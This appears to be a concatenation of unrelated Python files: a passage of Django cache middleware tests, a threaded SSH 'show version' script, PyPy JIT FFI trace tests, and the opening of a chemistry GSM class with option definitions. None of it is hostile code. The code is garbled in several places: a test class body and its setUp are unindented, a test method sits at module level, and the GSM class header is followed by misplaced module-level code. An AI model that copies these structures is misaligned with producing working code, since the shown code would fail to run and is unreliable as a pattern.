            return UpdateCacheMiddleware().process_response(request, response)

        # cache with non empty request.GET
        request = self.factory.get(self.path, {'foo': 'bar', 'other': 'true'})
        request._cache_update_cache = True

        get_cache_data = FetchFromCacheMiddleware().process_request(request)
        # first access, cache must return None
        self.assertEqual(get_cache_data, None)
        response = HttpResponse()
        content = 'Check for cache with QUERY_STRING'
        response.content = content
        UpdateCacheMiddleware().process_response(request, response)
        get_cache_data = FetchFromCacheMiddleware().process_request(request)
        # cache must return content
        self.assertNotEqual(get_cache_data, None)
        self.assertEqual(get_cache_data.content, content.encode())
        # different QUERY_STRING, cache must be empty
        request = self.factory.get(self.path, {'foo': 'bar', 'somethingelse': 'true'})
        request._cache_update_cache = True
        get_cache_data = FetchFromCacheMiddleware().process_request(request)
        self.assertEqual(get_cache_data, None)

        # i18n tests
        en_message = "Hello world!"
        es_message = "Hola mundo!"

        request = self.factory.get(self.path)
        request._cache_update_cache = True
        set_cache(request, 'en', en_message)
        get_cache_data = FetchFromCacheMiddleware().process_request(request)
        # Check that we can recover the cache
        self.assertNotEqual(get_cache_data, None)
        self.assertEqual(get_cache_data.content, en_message.encode())
        # Check that we use etags
        self.assertTrue(get_cache_data.has_header('ETag'))
        # Check that we can disable etags
        with self.settings(USE_ETAGS=False):
            request._cache_update_cache = True
            set_cache(request, 'en', en_message)
            get_cache_data = FetchFromCacheMiddleware().process_request(request)
            self.assertFalse(get_cache_data.has_header('ETag'))
        # change the session language and set content
        request = self.factory.get(self.path)
        request._cache_update_cache = True
        set_cache(request, 'es', es_message)
        # change again the language
        translation.activate('en')
        # retrieve the content from cache
        get_cache_data = FetchFromCacheMiddleware().process_request(request)
        self.assertEqual(get_cache_data.content, en_message.encode())
        # change again the language
        translation.activate('es')
        get_cache_data = FetchFromCacheMiddleware().process_request(request)
        self.assertEqual(get_cache_data.content, es_message.encode())
        # reset the language
        translation.deactivate()

    @override_settings(
        CACHE_MIDDLEWARE_KEY_PREFIX="test",
        CACHE_MIDDLEWARE_SECONDS=60,
        USE_ETAGS=True,
    )
    def test_middleware_doesnt_cache_streaming_response(self):
        request = self.factory.get(self.path)
        get_cache_data = FetchFromCacheMiddleware().process_request(request)
        self.assertIsNone(get_cache_data)

        # This test passes on Python < 3.3 even without the corresponding code
        # in UpdateCacheMiddleware, because pickling a StreamingHttpResponse
        # fails (http://bugs.python.org/issue14288). LocMemCache silently
        # swallows the exception and doesn't store the response in cache.
        content = ['Check for cache with streaming content.']
        response = StreamingHttpResponse(content)
        UpdateCacheMiddleware().process_response(request, response)

        get_cache_data = FetchFromCacheMiddleware().process_request(request)
        self.assertIsNone(get_cache_data)
@override_settings(
    CACHES={
        'default': {
            'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
            'KEY_PREFIX': 'cacheprefix'
        },
    },
)
class PrefixedCacheI18nTest(CacheI18nTest):
    """Re-run the CacheI18nTest suite with a KEY_PREFIX configured."""
def hello_world_view(request, value):
    """Trivial caching target: respond with a body that echoes ``value``."""
    body = 'Hello World %s' % value
    return HttpResponse(body)
@override_settings(
CACHE_MIDDLEWARE_ALIAS='other',
CACHE_MIDDLEWARE_KEY_PREFIX='middlewareprefix',
CACHE_MIDDLEWARE_SECONDS=30,
CACHE_MIDDLEWARE_ANONYMOUS_ONLY=False,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
'other': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'other',
'TIMEOUT': '1',
},
},
)
class CacheMiddlewareTest(IgnoreDeprecationWarningsMixin, TestCase):
def setUp(self):
super(CacheMiddlewareTest, self).setUp()
self.factory = RequestFactory()
self.default_cache = caches['default']
self.other_cache = caches['other']
def tearDown(self):
self.default_cache.clear()
self.other_cache.clear()
super(CacheMiddlewareTest, self).tearDown()
    def test_constructor(self):
        """
        Ensure the constructor is correctly distinguishing between usage of CacheMiddleware as
        Middleware vs. usage of CacheMiddleware as view decorator and setting attributes
        appropriately.
        """
        # If no arguments are passed in construction, it's being used as middleware.
        middleware = CacheMiddleware()

        # Now test object attributes against values defined in setUp above
        self.assertEqual(middleware.cache_timeout, 30)
        self.assertEqual(middleware.key_prefix, 'middlewareprefix')
        self.assertEqual(middleware.cache_alias, 'other')
        self.assertEqual(middleware.cache_anonymous_only, False)

        # If arguments are being passed in construction, it's being used as a decorator.
        # First, test with "defaults":
        as_view_decorator = CacheMiddleware(cache_alias=None, key_prefix=None)

        self.assertEqual(as_view_decorator.cache_timeout, 30)  # Timeout value for 'default' cache, i.e. 30
        self.assertEqual(as_view_decorator.key_prefix, '')
        self.assertEqual(as_view_decorator.cache_alias, 'default')  # Value of DEFAULT_CACHE_ALIAS from django.core.cache
        self.assertEqual(as_view_decorator.cache_anonymous_only, False)

        # Next, test with custom values:
        as_view_decorator_with_custom = CacheMiddleware(cache_anonymous_only=True, cache_timeout=60, cache_alias='other', key_prefix='foo')

        self.assertEqual(as_view_decorator_with_custom.cache_timeout, 60)
        self.assertEqual(as_view_decorator_with_custom.key_prefix, 'foo')
        self.assertEqual(as_view_decorator_with_custom.cache_alias, 'other')
        self.assertEqual(as_view_decorator_with_custom.cache_anonymous_only, True)
    def test_middleware(self):
        # Three middleware instances with distinct key prefixes/timeouts.
        middleware = CacheMiddleware()
        prefix_middleware = CacheMiddleware(key_prefix='prefix1')
        timeout_middleware = CacheMiddleware(cache_timeout=1)

        request = self.factory.get('/view/')

        # Put the request through the request middleware
        result = middleware.process_request(request)
        self.assertEqual(result, None)

        response = hello_world_view(request, '1')

        # Now put the response through the response middleware
        response = middleware.process_response(request, response)

        # Repeating the request should result in a cache hit
        result = middleware.process_request(request)
        self.assertNotEqual(result, None)
        self.assertEqual(result.content, b'Hello World 1')

        # The same request through a different middleware won't hit
        result = prefix_middleware.process_request(request)
        self.assertEqual(result, None)

        # The same request with a timeout _will_ hit
        result = timeout_middleware.process_request(request)
        self.assertNotEqual(result, None)
        self.assertEqual(result.content, b'Hello World 1')
    @override_settings(CACHE_MIDDLEWARE_ANONYMOUS_ONLY=True)
    def test_cache_middleware_anonymous_only_wont_cause_session_access(self):
        """ The cache middleware shouldn't cause a session access due to
        CACHE_MIDDLEWARE_ANONYMOUS_ONLY if nothing else has accessed the
        session. Refs 13283 """

        from django.contrib.sessions.middleware import SessionMiddleware
        from django.contrib.auth.middleware import AuthenticationMiddleware

        middleware = CacheMiddleware()
        session_middleware = SessionMiddleware()
        auth_middleware = AuthenticationMiddleware()

        request = self.factory.get('/view_anon/')

        # Put the request through the request middleware, in the order the
        # framework would apply them (session, auth, then cache).
        session_middleware.process_request(request)
        auth_middleware.process_request(request)
        result = middleware.process_request(request)
        self.assertEqual(result, None)

        response = hello_world_view(request, '1')

        # Now put the response through the response middleware
        session_middleware.process_response(request, response)
        response = middleware.process_response(request, response)

        # The cache middleware alone must not have touched the session.
        self.assertEqual(request.session.accessed, False)
    @override_settings(CACHE_MIDDLEWARE_ANONYMOUS_ONLY=True)
    def test_cache_middleware_anonymous_only_with_cache_page(self):
        """CACHE_MIDDLEWARE_ANONYMOUS_ONLY should still be effective when used
        with the cache_page decorator: the response to a request from an
        authenticated user should not be cached."""

        request = self.factory.get('/view_anon/')

        # Minimal stand-ins for an authenticated user with an accessed session.
        class MockAuthenticatedUser(object):
            def is_authenticated(self):
                return True

        class MockAccessedSession(object):
            accessed = True

        request.user = MockAuthenticatedUser()
        request.session = MockAccessedSession()

        response = cache_page(60)(hello_world_view)(request, '1')

        # No Cache-Control header means the response was not cached.
        self.assertFalse("Cache-Control" in response)
def test_view_decorator(self):
    """Decorating one view with differently-configured cache_page decorators
    must give each configuration its own cache entry, keyed by cache alias
    and key prefix; entries expire on their own cache's timeout.

    Fixes: removed the no-op expression statement ``caches['default']``
    and folded the repetitive request/assert pairs into data-driven loops.
    """
    # Decorate the same view with different cache decorators.
    default_view = cache_page(3)(hello_world_view)
    default_with_prefix_view = cache_page(3, key_prefix='prefix1')(hello_world_view)
    explicit_default_view = cache_page(3, cache='default')(hello_world_view)
    explicit_default_with_prefix_view = cache_page(3, cache='default', key_prefix='prefix1')(hello_world_view)
    other_view = cache_page(1, cache='other')(hello_world_view)
    other_with_prefix_view = cache_page(1, cache='other', key_prefix='prefix2')(hello_world_view)

    request = self.factory.get('/view/')

    # (view, request argument, expected content) before any cache expires.
    for view, arg, expected in [
        # Request the view once, then again -- second hit is cached.
        (default_view, '1', b'Hello World 1'),
        (default_view, '2', b'Hello World 1'),
        # The explicit 'default' cache shares the same entry.
        (explicit_default_view, '3', b'Hello World 1'),
        # A key prefix selects a different cache key.
        (explicit_default_with_prefix_view, '4', b'Hello World 4'),
        (explicit_default_with_prefix_view, '5', b'Hello World 4'),
        # The implicit cache with the same prefix hits the same entry.
        (default_with_prefix_view, '6', b'Hello World 4'),
        # An alternate cache starts cold, then serves its own entry.
        (other_view, '7', b'Hello World 7'),
        (other_view, '8', b'Hello World 7'),
        # Prefixing the alternate cache yields yet another entry.
        (other_with_prefix_view, '9', b'Hello World 9'),
    ]:
        response = view(request, arg)
        self.assertEqual(response.content, expected)

    # Wait long enough for the 1-second 'other' cache to expire, but not
    # the 3-second default cache.
    time.sleep(2)

    for view, arg, expected in [
        # The default cache and all its variants still hit.
        (default_view, '11', b'Hello World 1'),
        (default_with_prefix_view, '12', b'Hello World 4'),
        (explicit_default_view, '13', b'Hello World 1'),
        (explicit_default_with_prefix_view, '14', b'Hello World 4'),
        # The rapidly expiring cache missed, with or without a prefix.
        (other_view, '15', b'Hello World 15'),
        (other_with_prefix_view, '16', b'Hello World 16'),
    ]:
        response = view(request, arg)
        self.assertEqual(response.content, expected)
@override_settings(
    CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
    CACHE_MIDDLEWARE_SECONDS=1,
    CACHES={
        'default': {
            'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
        },
    },
    USE_I18N=False,
)
class TestWithTemplateResponse(TestCase):
    """
    Tests various headers w/ TemplateResponse.

    Most are probably redundant since they manipulate the same object
    anyway but the Etag header is 'special' because it relies on the
    content being complete (which is not necessarily always the case
    with a TemplateResponse)
    """
    def setUp(self):
        self.path = '/cache/test/'
        self.factory = RequestFactory()

    def tearDown(self):
        cache.clear()

    def test_patch_vary_headers(self):
        # Each case: existing Vary header (or None), headers to merge in,
        # and the expected resulting Vary value (case-insensitive merge).
        headers = (
            # Initial vary, new headers, resulting vary.
            (None, ('Accept-Encoding',), 'Accept-Encoding'),
            ('Accept-Encoding', ('accept-encoding',), 'Accept-Encoding'),
            ('Accept-Encoding', ('ACCEPT-ENCODING',), 'Accept-Encoding'),
            ('Cookie', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
            ('Cookie, Accept-Encoding', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
            ('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
            (None, ('Accept-Encoding', 'COOKIE'), 'Accept-Encoding, COOKIE'),
            ('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
            ('Cookie , Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
        )
        for initial_vary, newheaders, resulting_vary in headers:
            response = TemplateResponse(HttpResponse(), Template("This is a test"))
            if initial_vary is not None:
                response['Vary'] = initial_vary
            patch_vary_headers(response, newheaders)
            self.assertEqual(response['Vary'], resulting_vary)

    def test_get_cache_key(self):
        request = self.factory.get(self.path)
        response = TemplateResponse(HttpResponse(), Template("This is a test"))
        key_prefix = 'localprefix'
        # Expect None if no headers have been set yet.
        self.assertEqual(get_cache_key(request), None)
        # Set headers to an empty list.
        learn_cache_key(request, response)
        self.assertEqual(
            get_cache_key(request),
            'views.decorators.cache.cache_page.settingsprefix.GET.'
            '58a0a05c8a5620f813686ff969c26853.d41d8cd98f00b204e9800998ecf8427e'
        )
        # Verify that a specified key_prefix is taken into account.
        learn_cache_key(request, response, key_prefix=key_prefix)
        self.assertEqual(
            get_cache_key(request, key_prefix=key_prefix),
            'views.decorators.cache.cache_page.localprefix.GET.'
            '58a0a05c8a5620f813686ff969c26853.d41d8cd98f00b204e9800998ecf8427e'
        )

    def test_get_cache_key_with_query(self):
        request = self.factory.get(self.path, {'test': 1})
        response = TemplateResponse(HttpResponse(), Template("This is a test"))
        # Expect None if no headers have been set yet.
        self.assertEqual(get_cache_key(request), None)
        # Set headers to an empty list.
        learn_cache_key(request, response)
        # Verify that the querystring is taken into account.
        self.assertEqual(
            get_cache_key(request),
            'views.decorators.cache.cache_page.settingsprefix.GET.'
            '0f1c2d56633c943073c4569d9a9502fe.d41d8cd98f00b204e9800998ecf8427e'
        )

    @override_settings(USE_ETAGS=False)
    def test_without_etag(self):
        # With USE_ETAGS off, no ETag appears at any stage of rendering.
        response = TemplateResponse(HttpResponse(), Template("This is a test"))
        self.assertFalse(response.has_header('ETag'))
        patch_response_headers(response)
        self.assertFalse(response.has_header('ETag'))
        response = response.render()
        self.assertFalse(response.has_header('ETag'))

    @override_settings(USE_ETAGS=True)
    def test_with_etag(self):
        # The ETag can only be computed once the template has rendered,
        # so it appears only after render().
        response = TemplateResponse(HttpResponse(), Template("This is a test"))
        self.assertFalse(response.has_header('ETag'))
        patch_response_headers(response)
        self.assertFalse(response.has_header('ETag'))
        response = response.render()
        self.assertTrue(response.has_header('ETag'))
class TestEtagWithAdmin(TestCase):
    # See https://code.djangoproject.com/ticket/16003
    urls = "admin_views.urls"

    def test_admin(self):
        """The admin redirect carries an ETag header exactly when USE_ETAGS is on."""
        for use_etags, expect_etag in ((False, False), (True, True)):
            with self.settings(USE_ETAGS=use_etags):
                response = self.client.get('/test_admin/admin/')
                self.assertEqual(response.status_code, 302)
                self.assertEqual(response.has_header('ETag'), expect_etag)
class TestMakeTemplateFragmentKey(TestCase):
    """Exact cache keys produced by make_template_fragment_key."""

    def test_without_vary_on(self):
        self.assertEqual(
            make_template_fragment_key('a.fragment'),
            'template.cache.a.fragment.d41d8cd98f00b204e9800998ecf8427e',
        )

    def test_with_one_vary_on(self):
        self.assertEqual(
            make_template_fragment_key('foo', ['abc']),
            'template.cache.foo.900150983cd24fb0d6963f7d28e17f72',
        )

    def test_with_many_vary_on(self):
        self.assertEqual(
            make_template_fragment_key('bar', ['abc', 'def']),
            'template.cache.bar.4b35f12ab03cec09beec4c21b2d2fa88',
        )

    def test_proper_escaping(self):
        self.assertEqual(
            make_template_fragment_key('spam', ['abc:def%']),
            'template.cache.spam.f27688177baec990cdf3fbd9d9c3f469',
        )
class CacheHandlerTest(TestCase):
    def test_same_instance(self):
        """
        Attempting to retrieve the same alias should yield the same instance.
        """
        cache1 = caches['default']
        cache2 = caches['default']
        # assertIs reports both objects on failure, unlike assertTrue(x is y).
        self.assertIs(cache1, cache2)

    def test_per_thread(self):
        """
        Requesting the same alias from separate threads should yield separate
        instances.
        """
        c = []

        def runner():
            c.append(caches['default'])

        # Run two short-lived threads sequentially; each should get its own
        # thread-local cache instance.
        for x in range(2):
            t = threading.Thread(target=runner)
            t.start()
            t.join()

        self.assertIsNot(c[0], c[1])
|
ex2_show_version.py | import threading
from my_functions import ssh_command
from datetime import datetime
from my_devices import device_list
def thread_main():
    """Run 'show version' over SSH on every device, one thread per device,
    and report the total elapsed wall-clock time."""
    started_at = datetime.now()

    workers = []
    for device in device_list:
        worker = threading.Thread(target=ssh_command, args=(device, "show version"))
        workers.append(worker)
        worker.start()

    # Wait for every SSH session to finish before timing.
    for worker in workers:
        worker.join()

    finished_at = datetime.now()
    print(f"\nElapsed time is {finished_at - started_at}")


if __name__ == "__main__":
    thread_main()
|
test_ffi.py | import sys, py
from pypy.module.pypyjit.test_pypy_c.test_00_model import BaseTestPyPyC
class Test__ffi(BaseTestPyPyC):
    """JIT trace tests for foreign-function calls (_rawffi.alt, ctypes,
    _cffi_backend, cffi) under the PyPy JIT.

    Each test runs a small program via ``self.run`` and then matches the
    recorded trace operations (e.g. ``call_release_gil``) by ``# ID:`` tag.
    NOTE(review): the trace-template whitespace below was reconstructed;
    the matcher is whitespace-tolerant, but confirm against upstream.
    """

    def test__ffi_call(self):
        # A libm pow() call through _rawffi.alt should compile to a single
        # call_release_gil in the trace.
        from rpython.rlib.test.test_clibffi import get_libm_name

        def main(libm_name):
            try:
                from _rawffi.alt import CDLL, types
            except ImportError:
                sys.stderr.write('SKIP: cannot import _rawffi.alt\n')
                return 0

            libm = CDLL(libm_name)
            pow = libm.getfunc('pow', [types.double, types.double],
                               types.double)
            i = 0
            res = 0
            while i < 300:
                tmp = pow(2, 3)  # ID: fficall
                res += tmp
                i += 1
            return pow.getaddr(), res
        #
        libm_name = get_libm_name(sys.platform)
        log = self.run(main, [libm_name])
        pow_addr, res = log.result
        assert res == 8.0 * 300
        # Trace matching below is currently disabled pending re-optimization.
        py.test.skip("XXX re-optimize _ffi for the JIT?")
        loop, = log.loops_by_filename(self.filepath)
        if 'ConstClass(pow)' in repr(loop):  # e.g. OS/X
            pow_addr = 'ConstClass(pow)'
        assert loop.match_by_id('fficall', """
            guard_not_invalidated(descr=...)
            i17 = force_token()
            setfield_gc(p0, i17, descr=<.* .*PyFrame.vable_token .*>)
            f21 = call_release_gil(%s, 2.000000, 3.000000, descr=<Callf 8 ff EF=7>)
            guard_not_forced(descr=...)
            guard_no_exception(descr=...)
        """ % pow_addr)

    def test__ffi_call_frame_does_not_escape(self):
        # Wrapping the ffi call in a Python function must not force the
        # frame: only the virtualref is allocated.
        from rpython.rlib.test.test_clibffi import get_libm_name

        def main(libm_name):
            try:
                from _rawffi.alt import CDLL, types
            except ImportError:
                sys.stderr.write('SKIP: cannot import _rawffi.alt\n')
                return 0

            libm = CDLL(libm_name)
            pow = libm.getfunc('pow', [types.double, types.double],
                               types.double)

            def mypow(a, b):
                return pow(a, b)

            i = 0
            res = 0
            while i < 300:
                tmp = mypow(2, 3)
                res += tmp
                i += 1
            return pow.getaddr(), res
        #
        libm_name = get_libm_name(sys.platform)
        log = self.run(main, [libm_name])
        pow_addr, res = log.result
        assert res == 8.0 * 300
        loop, = log.loops_by_filename(self.filepath)
        opnames = log.opnames(loop.allops())
        # we only force the virtualref, not its content
        assert opnames.count('new_with_vtable') == 1

    def test__ffi_call_releases_gil(self):
        # Five threads sleeping concurrently should take ~1s total, which
        # proves the GIL is released around the foreign call.
        from rpython.rlib.clibffi import get_libc_name

        def main(libc_name, n):
            import time
            import os
            from threading import Thread
            #
            if os.name == 'nt':
                from _rawffi.alt import WinDLL, types
                libc = WinDLL('Kernel32.dll')
                sleep = libc.getfunc('Sleep', [types.uint], types.uint)
                delays = [0]*n + [1000]
            else:
                from _rawffi.alt import CDLL, types
                libc = CDLL(libc_name)
                sleep = libc.getfunc('sleep', [types.uint], types.uint)
                delays = [0]*n + [1]
            #
            def loop_of_sleeps(i, delays):
                for delay in delays:
                    sleep(delay)  # ID: sleep
            #
            threads = [Thread(target=loop_of_sleeps, args=[i, delays]) for i in range(5)]
            start = time.time()
            for i, thread in enumerate(threads):
                thread.start()
            for thread in threads:
                thread.join()
            end = time.time()
            return end - start
        log = self.run(main, [get_libc_name(), 200], threshold=150,
                       import_site=True)
        assert 1 <= log.result <= 1.5  # at most 0.5 seconds of overhead
        loops = log.loops_by_id('sleep')
        assert len(loops) == 1  # make sure that we actually JITted the loop

    def test_ctypes_call(self):
        # Same as test__ffi_call but through the ctypes layer.
        from rpython.rlib.test.test_clibffi import get_libm_name

        def main(libm_name):
            import ctypes
            libm = ctypes.CDLL(libm_name)
            fabs = libm.fabs
            fabs.argtypes = [ctypes.c_double]
            fabs.restype = ctypes.c_double
            x = -4
            i = 0
            while i < 300:
                x = fabs(x)
                x = x - 100
                i += 1
            return fabs._ptr.getaddr(), x

        libm_name = get_libm_name(sys.platform)
        log = self.run(main, [libm_name], import_site=True)
        fabs_addr, res = log.result
        assert res == -4.0
        loop, = log.loops_by_filename(self.filepath)
        ops = loop.allops()
        opnames = log.opnames(ops)
        assert opnames.count('new_with_vtable') == 1  # only the virtualref
        # Trace matching below is currently disabled pending re-optimization.
        py.test.skip("XXX re-optimize _ffi for the JIT?")
        assert opnames.count('call_release_gil') == 1
        idx = opnames.index('call_release_gil')
        call = ops[idx]
        assert (call.args[0] == 'ConstClass(fabs)' or  # e.g. OS/X
                int(call.args[0]) == fabs_addr)

    def test__ffi_struct(self):
        # Struct field access should compile to raw get/setfield.
        def main():
            from _rawffi.alt import _StructDescr, Field, types
            fields = [
                Field('x', types.slong),
            ]
            descr = _StructDescr('foo', fields)
            struct = descr.allocate()
            i = 0
            while i < 300:
                x = struct.getfield('x')  # ID: getfield
                x = x+1
                struct.setfield('x', x)  # ID: setfield
                i += 1
            return struct.getfield('x')
        #
        log = self.run(main, [])
        # Trace matching below is currently disabled pending re-optimization.
        py.test.skip("XXX re-optimize _ffi for the JIT?")
        loop, = log.loops_by_filename(self.filepath)
        assert loop.match_by_id('getfield', """
            guard_not_invalidated(descr=...)
            i57 = getfield_raw(i46, descr=<FieldS dynamic 0>)
        """)
        assert loop.match_by_id('setfield', """
            setfield_raw(i44, i57, descr=<FieldS dynamic 0>)
        """)

    def test__cffi_call(self):
        # ldexp() through _cffi_backend: one call_release_gil in the trace.
        from rpython.rlib.test.test_clibffi import get_libm_name

        def main(libm_name):
            try:
                import _cffi_backend
            except ImportError:
                sys.stderr.write('SKIP: cannot import _cffi_backend\n')
                return 0

            libm = _cffi_backend.load_library(libm_name)
            BDouble = _cffi_backend.new_primitive_type("double")
            BInt = _cffi_backend.new_primitive_type("int")
            BPow = _cffi_backend.new_function_type([BDouble, BInt], BDouble)
            ldexp = libm.load_function(BPow, 'ldexp')
            i = 0
            res = 0
            while i < 300:
                tmp = ldexp(1, 3)  # ID: cfficall
                res += tmp
                i += 1
            BLong = _cffi_backend.new_primitive_type("long")
            ldexp_addr = int(_cffi_backend.cast(BLong, ldexp))
            return ldexp_addr, res
        #
        libm_name = get_libm_name(sys.platform)
        log = self.run(main, [libm_name])
        ldexp_addr, res = log.result
        assert res == 8.0 * 300
        loop, = log.loops_by_filename(self.filepath)
        assert loop.match_by_id('cfficall', """
            p96 = force_token()
            setfield_gc(p0, p96, descr=<FieldP pypy.interpreter.pyframe.PyFrame.vable_token .>)
            f97 = call_release_gil(91, i59, 1.0, 3, descr=<Callf 8 fi EF=7 OS=62>)
            guard_not_forced(descr=...)
            guard_no_exception(descr=...)
        """, ignore_ops=['guard_not_invalidated'])

    def test_cffi_call_guard_not_forced_fails(self):
        # this is the test_pypy_c equivalent of
        # rpython/jit/metainterp/test/test_fficall::test_guard_not_forced_fails
        #
        # it requires cffi to be installed for pypy in order to run
        def main():
            import sys
            try:
                import cffi
            except ImportError:
                sys.stderr.write('SKIP: cannot import cffi\n')
                return 0

            ffi = cffi.FFI()

            ffi.cdef("""
            typedef void (*functype)(int);
            int foo(int n, functype func);
            """)

            lib = ffi.verify("""
            #include <signal.h>
            typedef void (*functype)(int);

            int foo(int n, functype func) {
                if (n >= 2000) {
                    func(n);
                }
                return n*2;
            }
            """)

            @ffi.callback("functype")
            def mycallback(n):
                if n < 5000:
                    return
                # make sure that guard_not_forced fails
                d = {}
                f = sys._getframe()
                while f:
                    d.update(f.f_locals)
                    f = f.f_back

            n = 0
            while n < 10000:
                res = lib.foo(n, mycallback)  # ID: cfficall
                # this is the real point of the test: before the
                # refactor-call_release_gil branch, the assert failed when
                # res == 5000
                assert res == n*2
                n += 1
            return n

        log = self.run(main, [], import_site=True,
                       discard_stdout_before_last_line=True)  # <- for Win32
        assert log.result == 10000
        loop, = log.loops_by_id('cfficall')
        assert loop.match_by_id('cfficall', """
            ...
            f1 = call_release_gil(..., descr=<Calli 4 ii EF=7 OS=62>)
            ...
        """)

    def test__cffi_bug1(self):
        # Calling the same cffi function with float then int args must not
        # crash the JIT (regression test; no trace matching).
        from rpython.rlib.test.test_clibffi import get_libm_name

        def main(libm_name):
            try:
                import _cffi_backend
            except ImportError:
                sys.stderr.write('SKIP: cannot import _cffi_backend\n')
                return 0

            libm = _cffi_backend.load_library(libm_name)
            BDouble = _cffi_backend.new_primitive_type("double")
            BSin = _cffi_backend.new_function_type([BDouble], BDouble)
            sin = libm.load_function(BSin, 'sin')

            def f(*args):
                for i in range(300):
                    sin(*args)

            f(1.0)
            f(1)
        #
        libm_name = get_libm_name(sys.platform)
        self.run(main, [libm_name])
        # assert did not crash

    def test_cffi_init_struct_with_list(self):
        # Initializing a small struct from a list should stay in the trace
        # as raw_store operations (no residual calls besides allocation).
        def main(n):
            import sys
            try:
                import cffi
            except ImportError:
                sys.stderr.write('SKIP: cannot import cffi\n')
                return 0

            ffi = cffi.FFI()
            ffi.cdef("""
                struct s {
                    short x;
                    short y;
                    short z;
                };
            """)

            for i in xrange(n):
                ffi.new("struct s *", [i, i, i])

        log = self.run(main, [300])
        loop, = log.loops_by_filename(self.filepath)
        assert loop.match("""
        i161 = int_lt(i160, i43)
        guard_true(i161, descr=...)
        i162 = int_add(i160, 1)
        setfield_gc(p22, i162, descr=<FieldS pypy.module.__builtin__.functional.W_XRangeIterator.inst_current .>)
        guard_not_invalidated(descr=...)
        p163 = force_token()
        p164 = force_token()
        p165 = getarrayitem_gc(p67, 0, descr=<ArrayP .>)
        guard_value(p165, ConstPtr(ptr70), descr=...)
        p166 = getfield_gc(p165, descr=<FieldP pypy.objspace.std.dictmultiobject.W_DictMultiObject.inst_strategy .+>)
        guard_value(p166, ConstPtr(ptr72), descr=...)
        p167 = call(ConstClass(_ll_0_alloc_with_del___), descr=<Callr . EF=5>)
        guard_no_exception(descr=...)
        i112 = int_signext(i160, 2)
        setfield_gc(p167, ConstPtr(ptr85), descr=<FieldP pypy.module._cffi_backend.cdataobj.W_CData.inst_ctype .+>)
        i114 = int_ne(i160, i112)
        guard_false(i114, descr=...)
        --TICK--
        i119 = call(ConstClass(_ll_1_raw_malloc_varsize__Signed), 6, descr=<Calli . i EF=5 OS=110>)
        raw_store(i119, 0, i160, descr=<ArrayS 2>)
        raw_store(i119, 2, i160, descr=<ArrayS 2>)
        raw_store(i119, 4, i160, descr=<ArrayS 2>)
        setfield_gc(p167, i119, descr=<FieldU pypy.module._cffi_backend.cdataobj.W_CData.inst__ptr .+>)
        i123 = arraylen_gc(p67, descr=<ArrayP .>)
        jump(..., descr=...)
        """)
|
gsm.py | from __future__ import print_function
# local application imports
import sys
import os
from os import path
sys.path.append(path.dirname(path.dirname(path.abspath(__file__))))
from coordinate_systems import Distance, Angle, Dihedral, OutOfPlane
from utilities import nifty, options, block_matrix
from wrappers import Molecule
from utilities.manage_xyz import write_molden_geoms
# standard library imports
# third party
import numpy as np
import multiprocessing as mp
from collections import Counter
from copy import copy
from itertools import chain
def worker(arg):
    """Dispatch helper for multiprocessing pools.

    ``arg`` is a tuple ``(obj, method_name, *call_args)``; look up
    ``method_name`` on ``obj`` and invoke it with the remaining items.
    """
    target, method_name = arg[0], arg[1]
    bound_method = getattr(target, method_name)
    return bound_method(*arg[2:])
#######################################################################################
#### This class contains the main constructor, object properties and staticmethods ####
#######################################################################################
# TODO interpolate is still sloppy. It shouldn't create a new molecule node itself
# but should create the xyz. GSM should create the new molecule based off that xyz.
# TODO nconstraints in ic_reparam and write_iters is irrelevant
class GSM(object):
from utilities import units
@staticmethod
def default_options():
    """Build (once) and return a copy of the Options template for GSM.

    The template is cached on the class as ``GSM._default_options`` so
    repeated calls are cheap; callers always get a copy they may mutate.
    """
    if hasattr(GSM, '_default_options'):
        return GSM._default_options.copy()
    opt = options.Options()

    opt.add_option(
        key='reactant',
        required=True,
        # allowed_types=[Molecule,wrappers.Molecule],
        doc='Molecule object as the initial reactant structure')

    opt.add_option(
        key='product',
        required=False,
        # allowed_types=[Molecule,wrappers.Molecule],
        doc='Molecule object for the product structure (not required for single-ended methods.')

    opt.add_option(
        key='nnodes',
        required=False,
        value=1,
        allowed_types=[int],
        doc="number of string nodes"
    )

    opt.add_option(
        key='optimizer',
        required=True,
        doc='Optimzer object to use e.g. eigenvector_follow, conjugate_gradient,etc. \
            most of the default options are okay for here since GSM will change them anyway',
    )

    opt.add_option(
        key='driving_coords',
        required=False,
        value=[],
        allowed_types=[list],
        doc='Provide a list of tuples to select coordinates to modify atoms\
            indexed at 1')

    opt.add_option(
        key='CONV_TOL',
        value=0.0005,
        required=False,
        allowed_types=[float],
        doc='Convergence threshold'
    )

    opt.add_option(
        key='CONV_gmax',
        value=0.001,
        required=False,
        allowed_types=[float],
        doc='Convergence threshold'
    )

    opt.add_option(
        key='CONV_Ediff',
        value=0.1,
        required=False,
        allowed_types=[float],
        doc='Convergence threshold'
    )

    opt.add_option(
        key='CONV_dE',
        value=0.5,
        required=False,
        allowed_types=[float],
        doc='Convergence threshold'
    )

    opt.add_option(
        key='ADD_NODE_TOL',
        value=0.1,
        required=False,
        allowed_types=[float],
        doc='Convergence threshold')

    opt.add_option(
        key="growth_direction",
        value=0,
        required=False,
        doc="how to grow string,0=Normal,1=from reactant"
    )

    opt.add_option(
        key="DQMAG_MAX",
        value=0.8,
        required=False,
        doc="max step along tangent direction for SSM"
    )

    opt.add_option(
        key="DQMAG_MIN",
        value=0.2,
        required=False,
        doc=""
    )

    opt.add_option(
        key='print_level',
        value=1,
        required=False
    )

    opt.add_option(
        key='xyz_writer',
        value=write_molden_geoms,
        required=False,
        doc='Function to be used to format and write XYZ files',
    )

    opt.add_option(
        key='mp_cores',
        value=1,
        doc='multiprocessing cores for parallel programming. Use this with caution.',
    )

    opt.add_option(
        key="BDIST_RATIO",
        value=0.5,
        required=False,
        doc="SE-Crossing uses this \
            bdist must be less than 1-BDIST_RATIO of initial bdist in order to be \
            to be considered grown.",
    )

